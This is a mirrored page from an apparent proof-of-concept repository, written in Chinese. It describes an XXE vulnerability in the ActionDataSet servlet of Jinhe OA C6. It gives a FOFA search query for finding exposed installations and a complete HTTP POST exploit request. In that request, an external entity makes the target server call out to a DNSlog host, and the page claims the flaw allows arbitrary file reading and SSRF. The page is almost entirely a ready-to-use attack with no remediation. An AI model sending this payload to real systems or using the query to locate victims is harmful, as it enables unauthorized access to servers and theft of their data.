mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-06 10:56:07 +00:00
26 lines
881 B
Markdown
26 lines
881 B
Markdown
|
# 金和OA-C6系统接口ActionDataSet存在XXE漏洞
|
|||
|
|
|
|||
|
|
金和OA-C6系统接口ActionDataSet存在XXE漏洞,攻击者可利用xxe漏洞获取服务器敏感数据,可读取任意文件以及ssrf攻击,存在一定的安全隐患。
|
|||
|
|
|
|||
|
|
## fofa
|
|||
|
|
|
|||
|
|
```javascript
|
|||
|
|
app="金和网络-金和OA"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## poc
|
|||
|
|
|
|||
|
|
```javascript
|
|||
|
|
POST /jc6/servlet/ActionDataSet HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Content-Type: application/xml
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.9
|
|||
|
|
Connection: close
|
|||
|
|
|
|||
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|||
|
|
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://323232323.xxxx.dnslog.cn"> %remote;]>
|
|||
|
|
```
|